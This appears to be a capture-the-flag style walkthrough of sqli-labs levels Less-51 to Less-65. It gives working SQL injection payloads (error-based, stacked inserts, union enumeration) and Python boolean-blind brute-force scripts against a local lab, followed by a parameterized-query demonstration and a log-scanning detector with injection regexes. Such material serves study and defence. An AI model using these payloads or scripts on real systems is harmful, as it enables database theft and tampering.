Less-51:
Open the challenge and test it: the parameter is closed with a single quote (') and the page returns database error messages, so error-based injection works directly, exactly as in Less-47:
1' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)-- dsa
Retrieve the username values:
Less-52:
Stacked injection works here:
Insert a row:
?sort=1;insert into users(id,username,password) values('17','hack','123456')-- da
The row hack that we inserted is there.
Less-53:
Same as Less-52 but without error messages, so use stacked injection again; the closure is a single quote ('):
Insert a row hack1:
?sort=1';insert into users(id,username,password) values('18','hack1','123456')-- da
Less-54:
Opening the challenge shows:
The challenge text says:
The objective of this challenge is to dump the (secret key) from a random table ("challenges") in the database in fewer than 10 attempts.
Just for fun, every reset generates a random table name, column names and table data. Keeps it fresh all the time.
So we probe it and find a union injection closed with a single quote ('):
Get the database name:
?id=-1' union select 1,database(),3-- ad
Next, get the tables:
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad
Get the columns of the table:
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='y3c6wljhoj'),3-- ad
Get the value of secret_HWX6 and submit it:
?id=-1' union select 1,(select group_concat(secret_HWX6) from y3c6wljhoj),3-- ad
Submit the key:
Less-55:
Same as Less-54, but closed with ):
Get the database name:
?id=-1) union select 1,database(),3-- ad
Get the table names:
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad
Get the column names:
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='k5fh2qgiut'),3-- ad
Get the secret value:
?id=-1) union select 1,(select group_concat(secret_2ICN) from k5fh2qgiut),3-- ad
Submit the key:
Less-56:
Same as the previous challenge, but closed with '):
Get the database name:
?id=-1') union select 1,database(),3-- ad
Get the table names:
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad
Get the column names:
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='k092nxgyt2'),3-- ad
Get the secret value:
?id=-1') union select 1,(select group_concat(secret_ZEE5) from k092nxgyt2),3-- ad
Submit the key:
Less-57:
Same as the previous challenge, but closed with a double quote (").
Tables and columns are retrieved the same way.
Get the secret value:
?id=-1" union select 1,(select group_concat(secret_RNUQ) from a0mg9eh2ot),3-- ad
Submit the key:
Less-58:
A single quote (') triggers an error, so as above we use error-based injection.
Tables and columns are retrieved with the same error-based method as in the earlier error-based challenges.
Get the secret value:
?id='and updatexml(1,concat(0x7e,(select group_concat(secret_JG7L) from 8ef31gojep),0x7e),1) -- asd
Submit the key:
Less-59:
Same as Less-58, but with an integer closure (no quotes).
Get the secret value:
?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_OUQ8) from sswc0q9fky),0x7e),1) -- asd
Submit the key:
Less-60:
Same as Less-59, but closed with "):
Get the secret value:
?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_GNZC) from 2xfjxrn4jr),0x7e),1) -- asd
Submit the key:
Less-61:
Same as Less-60, but closed with ')):
Get the secret value:
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_QC5B) from vcyf8g5w12),0x7e),1) -- asd
Submit the key:
Less-62:
The page behaves as a boolean: there are no error messages, and the closure is '), so error-based injection is not possible.
Union injection does not work either,
because the source code restricts how the username and password are output.
So we use boolean-based blind injection.
First determine the length of the database name:
when we test "length greater than 10" there is no output, but "greater than 9" shows Angelina.
So the database name is 10 characters long, and the oracle is whether Angelina appears in the response.
Python script:
import requests

url = 'http://127.0.0.1/sqli/Less-62/?id='
result = ''   # characters recovered so far
m = 0         # character position currently being tested
print('[*]开始爆破......')
print('[*]:', end='')
while True:
    m += 1            # next position (length)
    over = result     # snapshot: unchanged after the loop means the end was reached
    for code in range(1, 256):
        # database name: f"1') and (ord(substr(database(),{m},1))={code})-- da"
        # table names:   f"1') and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        # column names:  f"1') and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vcyf8g5w12'),{m},1))={code})-- da"
        # value:         f"1') and (ord(substr((select group_concat(secret_QC5B) from vcyf8g5w12),{m},1))={code})-- da"
        payload = f"1') and (ord(substr((select group_concat(secret_QC5B) from vcyf8g5w12),{m},1))={code})-- da"
        html = requests.get(url + payload)
        if 'Angelina' in html.text:   # true branch: the page shows Angelina
            result += chr(code)
            print(chr(code), end='')
            break                     # only one code can match this position
    if over == result:   # no code matched: the string is complete
        break
print()
print(f'[*]爆破结果:{result}')
Get the secret value:
Submit the key:
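What the script above loops over is a one-bit oracle: two requests that differ only in the truth of the injected condition produce distinguishable pages. The following added example (not part of this write-up or of sqli-labs) shows that oracle on a string-built query and its absence on a parameter-bound one, using Python's sqlite3 in place of MySQL; the users table, its rows and the probe values are constructed, and the ') closure matches Less-62 (Less-63 to Less-65 differ only in the closing sequence).

```python
import sqlite3


# Constructed stand-in for the lab's table; names and rows are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn


def lookup_vulnerable(conn, user_input):
    """String-built query: the ') in the input closes the literal and the
    parenthesis, so whatever follows is evaluated as SQL."""
    sql = f"SELECT username FROM users WHERE id=('{user_input}') LIMIT 1"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_input):
    """Bound parameter: the whole input is compared as a single value, so the
    quote and parenthesis are data, not syntax."""
    sql = "SELECT username FROM users WHERE id=(?) LIMIT 1"
    return [row[0] for row in conn.execute(sql, (user_input,))]


# Two requests that differ only in the truth of the injected condition,
# the same shape as the page's "1') and (...)-- da" probes (constructed).
TRUE_PROBE = "2') and (1=1)-- da"
FALSE_PROBE = "2') and (1=2)-- da"


def has_boolean_oracle(lookup, conn):
    """The endpoint leaks one bit per request when the two probes are
    distinguishable; a blind script recovers data one such bit at a time."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


def page_shows_angelina(lookup, conn, user_input):
    """The oracle the write-up uses: does 'Angelina' appear in the response."""
    return "Angelina" in lookup(conn, user_input)


if __name__ == "__main__":
    conn = make_db()
    for lookup in (lookup_vulnerable, lookup_parameterized):
        print(lookup.__name__, "id=2 ->", lookup(conn, "2"),
              "| oracle present:", has_boolean_oracle(lookup, conn))
```

Both versions answer the legitimate request id=2 identically; only the string-built one answers the two probes differently. A response-size or response-body diff between such probe pairs is also a cheap way to confirm the oracle is gone after a fix.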
Less-63
Same as Less-62, but closed with a single quote (').
Python script:
import requests

url = 'http://127.0.0.1/sqli/Less-63/?id='
result = ''   # characters recovered so far
m = 0         # character position currently being tested
print('[*]开始爆破......')
print('[*]:', end='')
while True:
    m += 1            # next position (length)
    over = result     # snapshot: unchanged after the loop means the end was reached
    for code in range(1, 256):
        # database name: f"1' and (ord(substr(database(),{m},1))={code})-- da"
        # table names:   f"1' and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        # column names:  f"1' and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='nfzptrb2e3'),{m},1))={code})-- da"
        # value:         f"1' and (ord(substr((select group_concat(secret_CKD1) from nfzptrb2e3),{m},1))={code})-- da"
        payload = f"1' and (ord(substr((select group_concat(secret_CKD1) from nfzptrb2e3),{m},1))={code})-- da"
        html = requests.get(url + payload)
        if 'Angelina' in html.text:   # true branch: the page shows Angelina
            result += chr(code)
            print(chr(code), end='')
            break                     # only one code can match this position
    if over == result:   # no code matched: the string is complete
        break
print()
print(f'[*]爆破结果:{result}')
Get the secret value:
Submit the key:
Less-64
Same as Less-63, but closed with )).
Python script:
import requests

url = 'http://127.0.0.1/sqli/Less-64/?id='
result = ''   # characters recovered so far
m = 0         # character position currently being tested
print('[*]开始爆破......')
print('[*]:', end='')
while True:
    m += 1            # next position (length)
    over = result     # snapshot: unchanged after the loop means the end was reached
    for code in range(1, 256):
        # database name: f"1)) and (ord(substr(database(),{m},1))={code})-- da"
        # table names:   f"1)) and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        # column names:  f"1)) and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qzqoywa5dj'),{m},1))={code})-- da"
        # value:         f"1)) and (ord(substr((select group_concat(secret_C3YJ) from qzqoywa5dj),{m},1))={code})-- da"
        payload = f"1)) and (ord(substr((select group_concat(secret_C3YJ) from qzqoywa5dj),{m},1))={code})-- da"
        html = requests.get(url + payload)
        if 'Angelina' in html.text:   # true branch: the page shows Angelina
            result += chr(code)
            print(chr(code), end='')
            break                     # only one code can match this position
    if over == result:   # no code matched: the string is complete
        break
print()
print(f'[*]爆破结果:{result}')
Get the secret value:
Submit the key:
Less-65
Same as Less-64, but closed with 1").
Python script:
import requests

url = 'http://127.0.0.1/sqli/Less-65/?id='
result = ''   # characters recovered so far
m = 0         # character position currently being tested
print('[*]开始爆破......')
print('[*]:', end='')
while True:
    m += 1            # next position (length)
    over = result     # snapshot: unchanged after the loop means the end was reached
    for code in range(1, 256):
        # database name: f"1\") and (ord(substr(database(),{m},1))={code})-- da"
        # table names:   f"1\") and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        # column names:  f"1\") and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='7qaeec6nuf'),{m},1))={code})-- da"
        # value:         f"1\") and (ord(substr((select group_concat(secret_WKXE) from 7qaeec6nuf),{m},1))={code})-- da"
        payload = f"1\") and (ord(substr((select group_concat(secret_WKXE) from 7qaeec6nuf),{m},1))={code})-- da"
        html = requests.get(url + payload)
        if 'Angelina' in html.text:   # true branch: the page shows Angelina
            result += chr(code)
            print(chr(code), end='')
            break                     # only one code can match this position
    if over == result:   # no code matched: the string is complete
        break
print()
print(f'[*]爆破结果:{result}')
Get the secret value:
Submit the key:
As for the remaining challenges:
looking at the source code,
the labs end at Less-65.
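Across Less-51 to Less-65 the write-up uses four injection families: error-based (updatexml), stacked queries, union-based with information_schema enumeration, and boolean-blind character probing with ord(substr(...)). The following added example (not part of this write-up or of sqli-labs) is a small triage scanner from the defender's side: it URL-decodes the request path of each access-log line and tags the family it matches. The log lines are constructed to mirror the page's payload shapes plus two benign requests; the rule names and the regular expressions are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the lab); the request shapes mirror the
# payload families used in this write-up, followed by two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-51/?sort=1'%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username)%20from%20users),0x7e),1)--%20dsa HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-52/?sort=1;insert%20into%20users(id,username,password)%20values('17','hack','123456')--%20da HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-54/?id=-1'%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3--%20ad HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-62/?id=1')%20and%20(ord(substr(database(),1,1))=99)--%20da HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-62/?id=1 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=union+station+select+trains HTTP/1.1" 200 812
"""

# (rule name, pattern) pairs; names and patterns are this example's own.
RULES = [
    ("error-based (updatexml/extractvalue)",
     re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("union-based",
     re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("stacked query",
     re.compile(r";\s*(insert|update|delete|drop|create|alter)\b", re.I)),
    ("boolean-blind char oracle",
     re.compile(r"\b(ord|ascii)\s*\(\s*(substr|substring|mid)\s*\(", re.I)),
    ("schema enumeration",
     re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
]

# Request path out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify_request(path):
    """Return the names of every rule that matches the URL-decoded path."""
    decoded = unquote_plus(path)
    return [name for name, pattern in RULES if pattern.search(decoded)]


def scan_log(text):
    """Return (path, matched_rule_names) for each line that trips a rule."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        tags = classify_request(match.group(1))
        if tags:
            hits.append((match.group(1), tags))
    return hits


if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(", ".join(tags), "<-", path[:70])
```

Decoding before matching matters: every keyword in these payloads arrives percent-encoded, and the Less-62 style probes would otherwise look like ordinary id lookups. Signature matching like this is a triage aid for hunting and alerting, not a substitute for the parameterized queries and allowlists that remove the injection itself; a long run of near-identical requests differing only in the compared character value, as produced by the blind scripts, is the behavioural signal to look for alongside it.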